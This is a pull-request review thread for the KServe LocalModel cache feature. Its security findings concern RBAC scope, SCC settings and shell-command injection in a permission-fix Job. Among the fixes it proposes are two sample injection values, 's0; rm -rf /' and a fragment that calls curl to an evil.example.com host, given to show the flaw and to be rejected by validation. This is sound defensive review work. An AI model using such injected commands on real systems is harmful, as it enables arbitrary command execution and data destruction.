GetInferenceServiceConfigMap/NewLocalModelConfig for the PVC namespace). Ensure
the function that calls this cleanup handles the returned error so finalizer
removal is deferred until cleanup succeeds.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go`:
- Around line 23-24: Remove the cluster-wide RBAC markers that grant
persistentvolume and persistentvolumeclaim create/delete rights from the
LocalModelNode agent (specifically the +kubebuilder:rbac lines for
groups=core,resources=persistentvolumes and persistentvolumeclaims in
controller.go) so the agent no longer gets cluster-scoped PV/PVC mutation
permissions; instead grant only namespace-scoped PVC permissions via a Role in
the model-cache namespace (move any PVC rights into the Role manifest under your
rbac/ or config/roles manifests) and extract any PV lifecycle handling to a
separate, tightly-scoped controller or operator with its own ClusterRole if
truly required.
- Around line 691-729: The job currently interpolates mcsLevel directly into a
shell string (chconCmd) and into the container Command in the fix-permissions
Container, which can lead to command injection; validate mcsLevel against a
strict MCS token pattern (allow only the exact expected character set/format for
SELinux MCS labels) before using it and reject/ignore any non-matching values,
or eliminate the shell by constructing the container command without sh -c (pass
chown and chcon as argument lists and separate args for the level and path).
Update the code that builds chconCmd, selinuxLevel and the Container Command
(variables: mcsLevel, chconCmd, selinuxLevel, and the Job/Container spec for
"fix-permissions") to perform the validation or to use exec-style args instead
of string interpolation into "sh -c".
- Around line 500-503: Move the ConfigMap resolution that sets jobNamespace to
run before calling cleanupJobs() so cleanupJobs() never executes with the
zero-value namespace; specifically, ensure the code that reads the
ConfigMap/variable that populates jobNamespace (the same logic that is currently
executed after cleanupJobs()) is run first, then call cleanupJobs(ctx, c,
localModelNode) (or the existing call site). Add a validation check after
resolving jobNamespace that it is non-empty (if jobNamespace == "" return an
error and stop processing) and update any calls that build the label-scoped list
(the c.List call that uses client.InNamespace(jobNamespace) and labelSelector
{"node": localModelNode.Name}) to rely on the validated jobNamespace to prevent
cross-namespace deletions.
- Around line 198-202: Replace the current unconditional use of
getProcessMCSLevel() (used when setting podSecurityContext.SELinuxOptions and in
the permission-fix job block) with logic that first fetches the target
namespace's SELinux MCS annotation ("openshift.io/sa.scc.mcs") for the
jobNamespace and uses that when present; only if that annotation is
missing/empty should you fall back to the controller process label returned by
getProcessMCSLevel(), and only use that fallback if it is actually appropriate
for the target namespace (i.e., validate equality/compatibility with the
namespace annotation when possible or treat it as
last-resort/SELinux-unavailable fallback). Update both the podSecurityContext
assignment site and the permission-fix job handling (the block referencing
getProcessMCSLevel() around podSecurityContext.SELinuxOptions and the code at
the permission-fix job path) to perform this lookup and conditional fallback
using the namespace object’s annotations.
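
For the injection concern above, a sketch of both suggested mitigations together: a strict MCS-token check plus exec-style argument construction that never passes the level through `sh -c` (the regex here is an illustrative approximation of the MCS label shape, not the full SELinux grammar):

```go
package main

import (
	"fmt"
	"regexp"
)

// mcsLevelPattern accepts only sensitivity/category tokens such as
// "s0" or "s0:c28,c27" — the expected shape of SELinux MCS labels.
var mcsLevelPattern = regexp.MustCompile(`^s\d+(:c\d+(,c\d+)*)?$`)

// chconArgs builds an exec-style argument list (no shell), so a
// malicious mcsLevel can never be interpreted as shell syntax.
func chconArgs(mcsLevel, mountPath string) ([]string, error) {
	if mcsLevel == "" {
		return []string{"chcon", "-R", "-t", "container_file_t", mountPath}, nil
	}
	if !mcsLevelPattern.MatchString(mcsLevel) {
		return nil, fmt.Errorf("invalid MCS level %q", mcsLevel)
	}
	return []string{"chcon", "-R", "-t", "container_file_t", "-l", mcsLevel, mountPath}, nil
}

func main() {
	args, err := chconArgs("s0:c28,c27", "/var/lib/kserve")
	fmt.Println(args, err)
	_, err = chconArgs("s0; rm -rf /", "/var/lib/kserve")
	fmt.Println(err) // rejected: shell metacharacters fail validation
}
```

The returned slice can feed the container `Command` directly, which removes the `sh -c` string interpolation the review flags.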

In `@pkg/controller/v1alpha1/localmodelnode/file_utils_test.go`:
- Around line 153-171: The test TestFileSystemHelper_isWritable relies on chmod
to create an unwritable dir which is UID-dependent; modify the test to detect
running as root (os.Geteuid()==0) and skip the read-only branch or use an
injected failure instead. Specifically, in TestFileSystemHelper_isWritable
(which constructs NewFileSystemHelper and calls isWritable), add a guard before
changing permissions: if running as root, call t.Skipf to skip the read-only
chmod/assertion branch; alternatively, refactor to inject a failing filesystem
or mock into NewFileSystemHelper so isWritable can be exercised without relying
on real permission bits.
- Around line 117-119: The test currently sets modelsRoot := tempDir which
points to an existing directory and thus never exercises the MkdirAll path;
update the setup in file_utils_test.go to use a non-existent child path (e.g.
join tempDir with a new subdirectory name) before calling NewFileSystemHelper so
Case 1 creates the folder; reference the modelsRoot variable and
NewFileSystemHelper in your change and add filepath.Join or equivalent to form
the child path (and import filepath if needed).

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go`:
- Line 31: Change isWritable() to return (bool, error) instead of bool; have the
function run the probe and return true,nil on success, false,os.PathError (or
the specific permission error) when permission-denied, and false,err for other
filesystem/mount/disk errors so callers can distinguish causes; update callers
(e.g., the Reconcile flow that currently treats a false as always requiring a
permission fix) to inspect the returned error and only enqueue/trigger the
permission-fix job when the error indicates a permission/SELinux denial, while
treating other errors (mount missing, read-only FS, ENOSPC) as different failure
paths or transient errors. Also apply the same signature and caller updates for
the related probe routines mentioned around lines 82-90 so all permission vs
non-permission failures are surfaced to the reconciler.

---

Outside diff comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 126-135: The ClusterRole kserve-localmodelnode-agent-role
currently allows cluster-wide get/list/watch on secrets; restrict this by either
(A) converting this ClusterRole into a namespaced Role in resources.yaml scoped
to the reconciler's jobNamespace (the namespace used by
LocalModelNodeReconciler) and update the corresponding RoleBinding to bind in
that namespace, or (B) keep it as a ClusterRole but replace the broad "secrets"
resource permission with a resourceNames list containing only the specific
secret names the controller reads (derived from jobNamespace configuration),
ensuring verbs remain limited to get/list/watch. Locate
kserve-localmodelnode-agent-role in resources.yaml and apply one of these fixes
and adjust bindings accordingly.

In `@config/localmodelnodes/manager.yaml`:
- Around line 65-69: The hostPath volume under volumes with hostPath.path
"/models" and readOnly false introduces a container escape risk; replace it with
a PVC-backed volume (use the existing localmodelnode-pv-pvc.yaml pattern) and
mount that PVC instead of hostPath, or if hostPath is absolutely required, make
the mount readOnly, add explicit path restrictions via OpenShift
SCC/PodSecurityPolicy, and document the security rationale; update the volume
declaration and any references to the "models" volume accordingly (e.g., in the
pod spec that mounts "models").

In `@localmodel-agent.Dockerfile`:
- Around line 22-25: The Dockerfile currently installs go-licenses with an
unpinned reference ("go install github.com/google/go-licenses@latest"), which
allows supply-chain changes and breaks reproducibility; change that invocation
to a pinned, immutable version (replace `@latest` with a specific release tag or
module version/commit hash) and rebuild using that pinned version so the
subsequent uses of /opt/app-root/src/go/bin/go-licenses (the check and save
commands) run a known, fixed binary; ensure the chosen tag is a stable release
(e.g., a vX.Y.Z tag or commit SHA) and update any documentation or build notes
to document the pinned version.

In `@localmodel.Dockerfile`:
- Around line 22-25: The Dockerfile currently installs go-licenses with an
unpinned version ("go install github.com/google/go-licenses@latest"); replace
`@latest` with a specific, audited release tag or commit hash (e.g., a vX.Y.Z tag
or a commit SHA) so the build is reproducible and not vulnerable to supply-chain
changes; update the installation line that produces
/opt/app-root/src/go/bin/go-licenses and any related build docs to reference the
chosen pinned version and, if desired, add a short comment with the upstream
release URL or checksum for future audits.

In `@pkg/controller/v1alpha1/localmodel/controller_test.go`:
- Around line 914-948: The test currently moves the download PVC into
modelCacheNamespace (pvcLookupKey) but only asserts the CR deletion, so it
doesn't verify the PVC was cleaned up; after deleting cachedModel and asserting
the CR is gone, add an Eventually assertion that attempts to Get the PVC via
pvcLookupKey (persistentVolumeClaim) and expects errors.IsNotFound(err) to be
true, ensuring the PVC is deleted; use the same timeout/interval and
k8sClient.Get(ctx, pvcLookupKey, persistentVolumeClaim) pattern as earlier to
avoid race conditions.

In `@python/kserve/kserve/models/v1beta1_local_model_config.py`:
- Around line 71-99: The constructor V1beta1LocalModelConfig.__init__ currently
places the parameter permission_fix_image before reconcilation_frequency_in_secs
which breaks positional-argument compatibility; reorder the parameters so
reconcilation_frequency_in_secs appears before permission_fix_image in the
method signature and move the corresponding conditional assignment block (the if
reconcilation_frequency_in_secs ... and if permission_fix_image ...) so
reconcilation_frequency_in_secs is checked/assigned prior to
permission_fix_image, ensuring the attribute names
_reconcilation_frequency_in_secs and _permission_fix_image (and their public
setters default_job_image, disable_volume_management, enabled, fs_group,
job_namespace, job_ttl_seconds_after_finished) remain unchanged.

---

Nitpick comments:
In `@charts/kserve-localmodel-resources/files/resources.yaml`:
- Around line 394-409: The DaemonSet currently uses a hostPath volume named
"models" mounted at /var/lib/kserve (and serviceAccountName
kserve-localmodelnode-agent), which can be unsafe for production; add a clear
inline YAML comment next to the volumes/mount (or a short note in chart README)
that this hostPath is intended for local/dev use only and that
production/OpenShift deployments should use the odh-with-modelcache overlay
(which replaces the hostPath with a PVC) or supply their own persistent storage;
ensure the comment references the "models" volume name and the mountPath
/var/lib/kserve so maintainers know exactly what to replace.

In `@config/overlays/odh-with-modelcache/localmodel-scc.yaml`:
- Around line 19-20: Replace the permissive seLinuxContext type value "RunAsAny"
with a stricter setting by updating the seLinuxContext block to use "MustRunAs"
and specify an appropriate SELinux type (for example "container_runtime_t" or
another cluster-approved type); locate the seLinuxContext section and change the
type field accordingly so the SCC enforces the chosen SELinux context instead of
allowing any.

In `@pkg/apis/serving/v1beta1/configmap.go`:
- Around line 391-400: The NewLocalModelConfig function returns raw JSON
unmarshal errors while sibling constructors like NewIngressConfig wrap errors
with context; update NewLocalModelConfig to wrap the error from json.Unmarshal
with a descriptive message (include LocalModelConfigName and that it failed to
parse into LocalModelConfig) before returning so callers get context, mirroring
the error-wrapping pattern used by NewIngressConfig and other New*Config
functions.
- Line 172: Add validation for the PermissionFixImage field after unmarshalling
by implementing a validateContainerImageRef(image string) error helper and
invoking it in NewLocalModelConfig to reject unsafe image references and enforce
an allowlist of permitted registries; specifically, have
validateContainerImageRef return nil for empty (optional) values, reject
whitespace or control characters and other unsafe characters, verify the
registry host is in your allowlist, and propagate/return an error from
NewLocalModelConfig if validation fails so callers can refuse untrusted
ConfigMap input.
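
A sketch of the suggested `validateContainerImageRef` helper; the allowlist contents are illustrative and would come from configuration in practice:

```go
package main

import (
	"fmt"
	"strings"
)

// allowedRegistries is an illustrative allowlist of permitted hosts.
var allowedRegistries = map[string]bool{
	"quay.io":                    true,
	"registry.access.redhat.com": true,
}

// validateContainerImageRef rejects unsafe characters and registries
// outside the allowlist; an empty value is accepted because the
// PermissionFixImage field is optional.
func validateContainerImageRef(image string) error {
	if image == "" {
		return nil // optional field
	}
	for _, r := range image {
		if r <= ' ' || r == 0x7f { // whitespace and control characters
			return fmt.Errorf("image ref contains unsafe character: %q", image)
		}
	}
	host := image
	if i := strings.IndexByte(image, '/'); i >= 0 {
		host = image[:i]
	}
	if !allowedRegistries[host] {
		return fmt.Errorf("registry %q is not in the allowlist", host)
	}
	return nil
}

func main() {
	fmt.Println(validateContainerImageRef("quay.io/opendatahub/kserve-controller:v0.15"))
	fmt.Println(validateContainerImageRef("evil.example.com/x:latest"))
}
```

`NewLocalModelConfig` would call this after unmarshalling and return the error, so an untrusted ConfigMap cannot smuggle in an arbitrary image.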

In
`@pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go`:
- Around line 116-130: The CreatePV/CreatePVC calls log errors but continue,
leaving partial state; change the reconciler to propagate failures by returning
the error (instead of only logging) so the controller will requeue and retry;
specifically, in the block that calls CreatePV(ctx, c.Clientset, c.Scheme,
c.Log, pv, nil, localModel) and the subsequent CreatePVC(ctx, c.Clientset,
c.Scheme, c.Log, pvc, localModelConfig.JobNamespace, nil, localModel) handle
non-nil err by returning that err (or a wrapped contextual error including
pv.Name/pvc.Name) from the reconcile function so the operation is aborted and
retried rather than proceeding.
- Line 128: The code calls CreatePVC with localModelConfig.JobNamespace without
validating it; add a defensive check before that call in the reconciler to
ensure localModelConfig.JobNamespace is non-empty and a valid namespace (e.g.,
if empty, either set it to localModel.Namespace or return an error), and if
invalid return/record a clear error (use c.Log.Errorf or return fmt.Errorf)
rather than proceeding to CreatePVC; update imports to include fmt if you use
fmt.Errorf.
- Around line 106-108: The call to ReconcileLocalModelNode currently logs errors
but does not stop reconciliation, allowing downstream PV/PVC creation to run
even on failure; change the block in localmodelnamespacecache_reconciler.go so
that if ReconcileLocalModelNode(ctx, c.Client, c.Log, nil, localModel,
nodeGroups) returns an error you both log it and return the error (or wrap it)
from the surrounding reconcile method instead of continuing, ensuring the
reconcile function (the caller) stops and propagates the failure.

In `@pkg/controller/v1alpha1/localmodelnode/controller_test.go`:
- Around line 1456-1539: The test only exercises the non-SELinux fallback
because getProcessMCSLevel() reads /proc and can't be controlled in envtest;
make the MCS reader injectable by refactoring getProcessMCSLevel into a function
variable or dependency (e.g., add a field mcsReader func() (string, error) on
the reconciler or a package-level var getProcessMCSLevelFunc) and use that in
the code path that builds the permission-fix Job, then update the test "Should
include MCS level in permission fix job chcon command" to set the injected
reader to return a non-empty value like "s0:c28,c27" (and restore it after the
test) so the Job command includes "-l <mcs>" and the test exercises the SELinux
branch.
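
The package-level seam that prompt proposes can look like this (names `getProcessMCSLevelFunc` and `buildChconCmd` are illustrative; the command string mirrors the existing `chconCmd` construction in the PR):

```go
package main

import "fmt"

// getProcessMCSLevelFunc is a package-level seam so tests can swap in
// a deterministic MCS reader instead of the real /proc-based lookup.
var getProcessMCSLevelFunc = func() (string, error) {
	// The real implementation would read /proc/self/attr/current.
	return "", nil
}

// buildChconCmd mirrors the Job's chcon command construction, taking
// the MCS level from the injectable seam.
func buildChconCmd(mountPath string) (string, error) {
	mcs, err := getProcessMCSLevelFunc()
	if err != nil {
		return "", err
	}
	if mcs == "" {
		return "chcon -R -t container_file_t " + mountPath, nil
	}
	return fmt.Sprintf("chcon -R -t container_file_t -l %s %s", mcs, mountPath), nil
}

func main() {
	// Test-style override, restored afterwards, exercising the SELinux branch.
	orig := getProcessMCSLevelFunc
	getProcessMCSLevelFunc = func() (string, error) { return "s0:c28,c27", nil }
	defer func() { getProcessMCSLevelFunc = orig }()
	cmd, _ := buildChconCmd("/var/lib/kserve")
	fmt.Println(cmd) // prints "chcon -R -t container_file_t -l s0:c28,c27 /var/lib/kserve"
}
```

The envtest case would override the variable in a `defer`-restored block exactly as `main` does here, letting the test assert on the `-l <mcs>` branch without touching /proc.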

In `@pkg/controller/v1alpha1/localmodelnode/file_utils.go`:
- Around line 82-90: Replace the fixed probe file in FileSystemHelper.isWritable
with a randomized temp file: use os.CreateTemp(f.modelsRootFolder,
".write-test-*") to create the temp file (capture file and err), close and
remove it, and return false on any error; update the function name reference
(isWritable on FileSystemHelper) accordingly and ensure cleanup happens even on
close/remove errors so concurrent probes won't conflict.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Pro

Run ID: 4c553d02-f14f-44d3-8d34-abfe6a02d65d

📥 Commits

Reviewing files that changed from the base of the PR and between c9f1a9f and 5560526.

📒 Files selected for processing (35)
  • charts/kserve-localmodel-resources/files/resources.yaml
  • config/localmodelnodes/manager.yaml
  • config/overlays/odh-with-modelcache/kustomization.yaml
  • config/overlays/odh-with-modelcache/localmodel-permissions-scc.yaml
  • config/overlays/odh-with-modelcache/localmodel-scc.yaml
  • config/overlays/odh-with-modelcache/localmodelnode-pv-pvc.yaml
  • config/overlays/odh-with-modelcache/openshift-ca-patch.yaml
  • config/overlays/odh-with-modelcache/openshift-serving-cert-localmodel-patch.yaml
  • config/overlays/odh-with-modelcache/remove-localmodel-cert-manager.yaml
  • config/overlays/odh/kustomization.yaml
  • config/overlays/odh/params.env
  • config/overlays/odh/params.yaml
  • config/overlays/odh/patches/inferenceservice-config-patch.yaml
  • config/overlays/odh/patches/remove-storagecontainer.yaml
  • config/rbac/localmodel/role.yaml
  • config/rbac/localmodelnode/role.yaml
  • localmodel-agent.Dockerfile
  • localmodel.Dockerfile
  • pkg/apis/serving/v1beta1/configmap.go
  • pkg/apis/serving/v1beta1/configmap_test.go
  • pkg/controller/v1alpha1/localmodel/controller.go
  • pkg/controller/v1alpha1/localmodel/controller_test.go
  • pkg/controller/v1alpha1/localmodel/reconcilers/localmodelnamespacecache_reconciler.go
  • pkg/controller/v1alpha1/localmodel/reconcilers/utils.go
  • pkg/controller/v1alpha1/localmodelnode/controller.go
  • pkg/controller/v1alpha1/localmodelnode/controller_test.go
  • pkg/controller/v1alpha1/localmodelnode/file_utils.go
  • pkg/controller/v1alpha1/localmodelnode/file_utils_test.go
  • pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go
  • pkg/openapi/openapi_generated.go
  • pkg/openapi/swagger.json
  • pkg/webhook/admission/pod/storage_initializer_injector.go
  • pkg/webhook/admission/pod/storage_initializer_injector_test.go
  • python/kserve/docs/V1beta1LocalModelConfig.md
  • python/kserve/kserve/models/v1beta1_local_model_config.py
💤 Files with no reviewable changes (1)
  • pkg/controller/v1beta1/inferenceservice/rawkube_controller_test.go

Comment on lines +10 to +36
allowPrivilegeEscalation: true
allowPrivilegedContainer: false
allowedCapabilities:
- CHOWN
- DAC_OVERRIDE
- FOWNER
defaultAddCapabilities: null
fsGroup:
type: RunAsAny
readOnlyRootFilesystem: true
requiredDropCapabilities:
- FSETID
- KILL
- MKNOD
- NET_BIND_SERVICE
- NET_RAW
- SETFCAP
- SETGID
- SETPCAP
- SETUID
- SYS_CHROOT
runAsUser:
type: RunAsAny
seLinuxContext:
type: RunAsAny
supplementalGroups:
type: RunAsAny

⚠️ Potential issue | 🟠 Major

Major: tighten this SCC before binding it.

allowPrivilegeEscalation: true plus runAsUser, fsGroup, supplementalGroups, and seLinuxContext all set to RunAsAny gives any workload that can use this SCC broad control over mounted volumes. If that ServiceAccount is compromised, an attacker can start a pod with arbitrary UID/GID/SELinux labels and CHOWN/DAC_OVERRIDE/FOWNER against PVC contents (CWE-250, CWE-732). Drop allowPrivilegeEscalation, keep the binding dedicated to the permission-fix ServiceAccount, and narrow the admitted UID/GID/SELinux strategies to the exact values this job needs.

As per coding guidelines: Security vulnerabilities (provide severity, exploit scenario, and remediation code).

namespace: opendatahub

patches:
- path: patches/remove-storagecontainer.yaml

⚠️ Potential issue | 🟠 Major

Move this delete patch out of the shared ODH overlay.

Wiring patches/remove-storagecontainer.yaml into config/overlays/odh makes every ODH install delete the cluster-scoped ClusterStorageContainer/default, which changes storage resolution for all KServe users on the cluster, not just the modelcache/OpenShift path in this PR. Scope this to the modelcache-specific overlay instead.

Suggested change
 patches:
-- path: patches/remove-storagecontainer.yaml
 - path: patches/remove-namespace.yaml
 - path: patches/remove-cert-manager.yaml

Add the delete patch only in the modelcache-specific overlay that needs this behavior.

As per coding guidelines: REVIEW PRIORITIES: 2. Architectural issues and anti-patterns.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh/kustomization.yaml` at line 19, The delete patch
patches/remove-storagecontainer.yaml is placed in the shared ODH overlay (odh)
and will delete ClusterStorageContainer/default for every ODH install; remove
the reference from the odh kustomization and add that single delete entry to the
modelcache-specific overlay's kustomization instead so the patch only applies
when the modelcache overlay is selected (update the odh kustomization to drop
the path and add the path to the modelcache overlay kustomization).

@@ -1,4 +1,4 @@
-kserve-controller=quay.io/opendatahub/kserve-controller:latest
+kserve-controller=quay.io/vedantm/kserve-controller:latest

⚠️ Potential issue | 🟠 Major

Personal registry image should not be merged to master.

quay.io/vedantm/kserve-controller:latest replaces the official opendatahub image. This introduces:

  1. Supply chain risk - personal registries lack organizational security controls.
  2. Non-reproducible builds with :latest tag.

Replace with official quay.io/opendatahub/kserve-controller image before merge.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/odh/params.env` at line 1, The env entry currently sets
kserve-controller to a personal, unpinned image
"quay.io/vedantm/kserve-controller:latest"; update the value for the
kserve-controller variable to use the official registry image
"quay.io/opendatahub/kserve-controller" and avoid the :latest tag (prefer a
specific released tag) so the line becomes
kserve-controller=quay.io/opendatahub/kserve-controller[:<release-tag>] ensuring
the official image and a fixed tag are used.

Comment on lines +500 to 503
for _, ns := range []string{jobNamespace} {
jobs := &batchv1.JobList{}
labelSelector := map[string]string{"node": localModelNode.Name}
if err := c.List(ctx, jobs, client.InNamespace(ns), client.MatchingLabels(labelSelector)); err != nil {

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

# First, let's locate and examine the file
find . -type f -name "controller.go" | grep -i localmodelnode

Repository: opendatahub-io/kserve

Length of output: 119


🏁 Script executed:

# Let's examine the file size and read the relevant sections
wc -l ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 123


🏁 Script executed:

# Read the section around lines 500-520 to understand the cleanupJobs call
sed -n '490,530p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1715


🏁 Script executed:

# Now let's find where cleanupJobs is called - look for the reconciliation function
sed -n '450,600p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 6003


🏁 Script executed:

# Continue reading to see where cleanupJobs is called in the Reconcile function
sed -n '560,650p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 3681


🏁 Script executed:

# Let's find where jobNamespace is declared - look at the top of the file for global variables
head -50 ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 2295


🏁 Script executed:

# Look for global variable declarations, specifically jobNamespace
sed -n '50,150p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 4276


🏁 Script executed:

# Let's verify the exact line numbers where jobNamespace is set and used
grep -n "jobNamespace" ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1085


🏁 Script executed:

# Let's confirm the flow - read lines 590-630 to see the exact sequence
sed -n '590,630p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1760


🏁 Script executed:

# Let's check what happens at line 615 and after to see if there's validation
sed -n '615,625p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 549


🏁 Script executed:

# Let's examine the actual cleanupJobs function and see the exact impact of using empty jobNamespace
sed -n '494,525p' ./pkg/controller/v1alpha1/localmodelnode/controller.go

Repository: opendatahub-io/kserve

Length of output: 1490


Critical: Load jobNamespace before calling cleanupJobs().

On cold start, jobNamespace remains the zero value ("") when cleanupJobs() executes. The Job list at line 502 uses client.InNamespace(""), which fails to scope the namespace filter properly. This allows jobs with matching node=<name> labels to be deleted across all namespaces instead of only the configured jobNamespace, enabling unauthorized deletion of resources (CWE-284). Move the ConfigMap resolution to before cleanupJobs() and add validation that jobNamespace is not empty; fail closed if missing.

Suggested fix
-	// 2. Cleanup jobs for models that are not in the spec
-	if err := c.cleanupJobs(ctx, localModelNode); err != nil {
-		c.Log.Error(err, "Job cleanup err")
-		return reconcile.Result{}, err
-	}
-
-	// 3. Kick off download jobs for all models in spec
 	isvcConfigMap, err := v1beta1.GetInferenceServiceConfigMap(ctx, c.Clientset)
 	if err != nil {
 		c.Log.Error(err, "unable to get configmap", "name", constants.InferenceServiceConfigMapName, "namespace", constants.KServeNamespace)
 		return reconcile.Result{}, err
 	}
@@
 	jobNamespace = localModelConfig.JobNamespace
+	if jobNamespace == "" {
+		return reconcile.Result{}, fmt.Errorf("localModel.jobNamespace must not be empty")
+	}
+
+	// 2. Cleanup jobs for models that are not in the spec
+	if err := c.cleanupJobs(ctx, localModelNode); err != nil {
+		c.Log.Error(err, "Job cleanup err")
+		return reconcile.Result{}, err
+	}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go` around lines 500 - 503,
Move the ConfigMap resolution that sets jobNamespace to run before calling
cleanupJobs() so cleanupJobs() never executes with the zero-value namespace;
specifically, ensure the code that reads the ConfigMap/variable that populates
jobNamespace (the same logic that is currently executed after cleanupJobs()) is
run first, then call cleanupJobs(ctx, c, localModelNode) (or the existing call
site). Add a validation check after resolving jobNamespace that it is non-empty
(if jobNamespace == "" return an error and stop processing) and update any calls
that build the label-scoped list (the c.List call that uses
client.InNamespace(jobNamespace) and labelSelector {"node":
localModelNode.Name}) to rely on the validated jobNamespace to prevent
cross-namespace deletions.

Comment on lines +691 to +729
	chconCmd := "chcon -R -t container_file_t " + MountPath
	if mcsLevel != "" {
		chconCmd = fmt.Sprintf("chcon -R -t container_file_t -l %s %s", mcsLevel, MountPath)
	}

	selinuxLevel := "s0"
	if mcsLevel != "" {
		selinuxLevel = mcsLevel
	}

	job := &batchv1.Job{
		ObjectMeta: metav1.ObjectMeta{
			GenerateName: jobName,
			Namespace:    jobNamespace,
			Labels:       fixLabels,
		},
		Spec: batchv1.JobSpec{
			TTLSecondsAfterFinished: &permFixTTL,
			BackoffLimit:            ptr.To(int32(0)),
			Template: corev1.PodTemplateSpec{
				Spec: corev1.PodSpec{
					ServiceAccountName: "kserve-localmodelnode-agent",
					NodeName:           nodeName,
					RestartPolicy:      corev1.RestartPolicyNever,
					SecurityContext: &corev1.PodSecurityContext{
						SELinuxOptions: &corev1.SELinuxOptions{
							Type:  "spc_t",
							Level: selinuxLevel,
						},
					},
					Containers: []corev1.Container{
						{
							Name:  "fix-permissions",
							Image: permissionFixImage,
							Command: []string{
								"sh", "-c",
								fmt.Sprintf("chown -R %d:%d %s && %s",
									os.Getuid(), os.Getgid(), MountPath, chconCmd),
							},

⚠️ Potential issue | 🟠 Major

Major: validate mcsLevel before embedding it in sh -c.

mcsLevel is interpolated straight into a root shell command. A malformed or unexpected value from namespace annotations or /proc/self/attr/current turns this into command injection inside the permission-fix Job (CWE-78). Validate against a strict MCS regex before constructing the command, or stop using sh -c here.

As per coding guidelines, **/*.go: Validate inputs before exec.Command (prevent command injection).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/controller.go` around lines 691 - 729,
The job currently interpolates mcsLevel directly into a shell string (chconCmd)
and into the container Command in the fix-permissions Container, which can lead
to command injection; validate mcsLevel against a strict MCS token pattern
(allow only the exact expected character set/format for SELinux MCS labels)
before using it and reject/ignore any non-matching values, or eliminate the
shell by constructing the container command without sh -c (pass chown and chcon
as argument lists and separate args for the level and path). Update the code
that builds chconCmd, selinuxLevel and the Container Command (variables:
mcsLevel, chconCmd, selinuxLevel, and the Job/Container spec for
"fix-permissions") to perform the validation or to use exec-style args instead
of string interpolation into "sh -c".

Comment on lines 117 to 119
 	tempDir := t.TempDir()
-	modelsRoot := filepath.Join(tempDir, "models")
+	modelsRoot := tempDir
 	helper := NewFileSystemHelper(modelsRoot)

⚠️ Potential issue | 🟡 Minor

This case no longer exercises folder creation.

modelsRoot := tempDir points at a directory that already exists, so “Case 1” stops testing the MkdirAll path despite the comment saying otherwise. Use a child path under tempDir here.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha1/localmodelnode/file_utils_test.go` around lines 117 -
119, The test currently sets modelsRoot := tempDir which points to an existing
directory and thus never exercises the MkdirAll path; update the setup in
file_utils_test.go to use a non-existent child path (e.g. join tempDir with a
new subdirectory name) before calling NewFileSystemHelper so Case 1 creates the
folder; reference the modelsRoot variable and NewFileSystemHelper in your change
and add filepath.Join or equivalent to form the child path (and import filepath
if needed).

@VedantMahabaleshwarkar
Author

/hold need to change controller image after initial approval

@VedantMahabaleshwarkar
Author

Go test failures seem unrelated to the changes (InferenceGraph failures), and I also cannot reproduce locally. make test passes locally 🤔

@VedantMahabaleshwarkar
Author

/retest-required

@openshift-ci

openshift-ci bot commented Mar 12, 2026

@VedantMahabaleshwarkar: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name              Commit   Details  Required  Rerun command
ci/prow/e2e-raw        5560526  link     true      /test e2e-raw
ci/prow/e2e-graph      5560526  link     true      /test e2e-graph
ci/prow/e2e-predictor  5560526  link     true      /test e2e-predictor

Full PR test history. Your PR dashboard.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

Comment on lines +691 to +694
	chconCmd := "chcon -R -t container_file_t " + MountPath
	if mcsLevel != "" {
		chconCmd = fmt.Sprintf("chcon -R -t container_file_t -l %s %s", mcsLevel, MountPath)
	}
Member

The mcsLevel value is interpolated directly into a shell command via sh -c + fmt.Sprintf without any input validation. When sourced from the namespace annotation fallback (openshift.io/sa.scc.mcs at line 578), this is user-writable content. A malicious annotation like s0:c1,c2 ; curl http://evil.example.com # would execute arbitrary commands as root inside a spc_t container.

The /proc/self/attr/current source is kernel-controlled and safe, but the namespace annotation fallback is not.

We should either validate the MCS level with a strict regex, or avoid sh -c entirely by using exec-form commands:

import "regexp"

  var validMCSLevel = regexp.MustCompile(`^s\d+(-s\d+)?(:(c\d{1,4})(,c\d{1,4})*)*$`)

  func sanitizeMCSLevel(level string) string {
      level = strings.TrimSpace(level)
      if validMCSLevel.MatchString(level) {
          return level
      }
      return ""
  }

Apply sanitizeMCSLevel() to both sources (line 570 getProcessMCSLevel() return and line 578 namespace annotation). Even better, replace sh -c with exec-form or two init containers (one for chown, one for chcon) so shell metacharacters are never interpreted.


@ugiordan replaced this PR with #1220 to better isolate the openshift-specific changes and contribute the rest upstream. I re-opened your comments there; I've already made the changes to address them

@VedantMahabaleshwarkar
Author

replaced by #1220


Projects

Status: Done

Development

Successfully merging this pull request may close these issues.

2 participants